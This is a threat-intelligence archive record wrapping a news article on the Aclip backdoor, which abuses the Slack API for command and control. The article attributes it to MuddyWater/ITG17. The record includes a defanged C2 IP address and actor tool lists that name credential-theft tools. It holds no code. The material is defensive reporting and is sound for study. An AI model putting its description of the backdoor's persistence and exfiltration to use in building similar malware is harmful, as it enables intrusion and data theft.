{ "id": "e424fbf0-6b34-412d-a0bd-1b89fb8e53ca", "created_at": "2026-04-06T00:12:20.695249Z", "updated_at": "2026-04-10T03:34:22.682457Z", "deleted_at": null, "sha1_hash": "760afbe0f2194972a2068ca73d3e29a965c5bfe2", "title": "State-sponsored hackers abuse Slack API to steal airline data", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2749187, "plain_text": "State-sponsored hackers abuse Slack API to steal airline data\r\nBy Bill Toulas\r\nPublished: 2021-12-15 · Archived: 2026-04-05 15:33:09 UTC\r\nA suspected Iranian state-supported threat actor is deploying a newly discovered backdoor named 'Aclip' that abuses the\r\nSlack API for covert communications.\r\nThe threat actor's activity started in 2019 and targeted an unnamed Asian airline to steal flight reservation data.\r\nAccording to a report by IBM Security X-Force, the threat actor is likely ITG17, aka 'MuddyWater,' a very active hacking\r\ngroup that maintains a targets organizations worldwide.\r\nhttps://www.bleepingcomputer.com/news/security/state-sponsored-hackers-abuse-slack-api-to-steal-airline-data/\r\nPage 1 of 5\n\n0:00\r\nhttps://www.bleepingcomputer.com/news/security/state-sponsored-hackers-abuse-slack-api-to-steal-airline-data/\r\nPage 2 of 5\n\nVisit Advertiser websiteGO TO PAGE\r\nAbusing Slack\r\nSlack is an ideal platform for concealing malicious communications as the data can blend well with regular business traffic\r\ndue to its widespread deployment in the enterprise.\r\nThis type of abuse is a tactic that other actors have followed in the past, so it's not a new trick. Also, Slack isn't the\r\nonly legitimate messaging platform to be abused for relaying data and commands covertly.\r\nIn this case, the Slack API is utilized by the Aclip backdoor to send system information, files, and screenshots to the C2,\r\nwhile receiving commands in return.\r\nIBM researchers spotted the threat actors abusing this communication channel in March 2021 and responsibly disclosed it to\r\nSlack.\r\nSlack issued the following public statement in response:\r\n\"As detailed in this post, IBM X-Force has discovered and is actively tracking a third party that is attempting to\r\nuse targeted malware leveraging free workspaces in Slack. As part of the X-Force investigation, we were made\r\naware of free workspaces being used in this manner.\r\nWe investigated and immediately shut down the reported Slack Workspaces as a violation of our terms of service.\r\nWe confirmed that Slack was not compromised in any way as part of this incident, and no Slack customer data\r\nwas exposed or at risk. We are committed to preventing the misuse of our platform, and we take action against\r\nanyone who violates our terms of service.\r\nSlack encourages people to be vigilant and to review and enforce basic security measures, including the use of\r\ntwo-factor authentication, ensuring that their computer software and anti-virus software is up to date, creating\r\nnew and unique passwords for every service they use, and exercising caution when interacting with people they\r\ndon't know.\" - Slack.\r\nThe Aclip backdoor\r\nAclip is a newly observed backdoor executed via a Windows batch script named 'aclip.bat,' hence the name.\r\nThe backdoor establishes persistence on an infected device by adding a registry key and launches automatically upon system\r\nstartup.\r\nAclip receives PowerShell commands from the C2 server via Slack API functions and can be used to execute further\r\ncommands, send screenshots of the active Windows desktop, and exfiltrate files.\r\nhttps://www.bleepingcomputer.com/news/security/state-sponsored-hackers-abuse-slack-api-to-steal-airline-data/\r\nPage 3 of 5\n\nAclip operational diagram\r\nSource: IBM\r\nUpon first execution, the backdoor collects basic system information, including hostname, username, and the external IP\r\naddress. This data is encrypted with Base64 and exfiltrated to the threat actor. \r\nFrom then on, the command execution query phase begins, with Aclip connecting to a different channel on the actor-controlled Slack workspace.\r\nScreenshots are taken using PowerShell's graphic library and saved to %TEMP% until exfiltration. After the images have\r\nbeen uploaded to the C2, they are wiped.\r\nIBM linked the attack to MuddyWaters/ITG17 after their investigation found two custom malware samples known to be\r\nattributed to the hacking group. \r\n\"The investigation yielded two custom tools that correspond to malware previously attributed to ITG17, a backdoor\r\n‘Win32Drv.exe,’ and the web shell ‘OutlookTR.aspx’,\" explains IBM's report.\r\n\"Within the configuration of Win32Drv.exe, is the C2 IP address 46.166.176[.]210, which has previously been used to host a\r\nC2 domain associated with the Forelord DNS tunneling malware publicly attributed to MuddyWater.\"\r\nHow to defend\r\nDetecting traffic that blends so well with remote collaboration tools such as Slack can be challenging, especially during a\r\nremote work boom which creates more hiding opportunities for actors.\r\nIBM suggests focusing on strengthening your PowerShell security stance instead and proposes the following measures:\r\nFrequently check PowerShell logs and module logging records\r\nhttps://www.bleepingcomputer.com/news/security/state-sponsored-hackers-abuse-slack-api-to-steal-airline-data/\r\nPage 4 of 5\n\nLimit PowerShell access to only specific commands and functions for each user\r\nDisable or restrict Windows Remote Management Service\r\nCreate and use YARA rules to detect malicious PowerShell scripts\r\nHowever, IBM warns that the abuse of messaging applications will continue to evolve as the enterprise increasingly adopts\r\nthese solutions.\r\n\"With a wave of businesses shifting to a permanent or wide adoption of a remote workforce, continuing to implement\r\nmessaging applications as a form of group production and chat, X-Force assesses that these applications will continue to be\r\nused by malicious actors to control and distribute malware undetected,\" concluded IBM.\r\nAutomated Pentesting Covers Only 1 of 6 Surfaces.\r\nAutomated pentesting proves the path exists. BAS proves whether your controls stop it. Most teams run one without the\r\nother.\r\nThis whitepaper maps six validation surfaces, shows where coverage ends, and provides practitioners with three diagnostic\r\nquestions for any tool evaluation.\r\nSource: https://www.bleepingcomputer.com/news/security/state-sponsored-hackers-abuse-slack-api-to-steal-airline-data/\r\nhttps://www.bleepingcomputer.com/news/security/state-sponsored-hackers-abuse-slack-api-to-steal-airline-data/\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.bleepingcomputer.com/news/security/state-sponsored-hackers-abuse-slack-api-to-steal-airline-data/" ], "report_names": [ "state-sponsored-hackers-abuse-slack-api-to-steal-airline-data" ], "threat_actors": [ { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434340, "ts_updated_at": 1775792062, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/760afbe0f2194972a2068ca73d3e29a965c5bfe2.pdf", "text": "https://archive.orkl.eu/760afbe0f2194972a2068ca73d3e29a965c5bfe2.txt", "img": "https://archive.orkl.eu/760afbe0f2194972a2068ca73d3e29a965c5bfe2.jpg" } }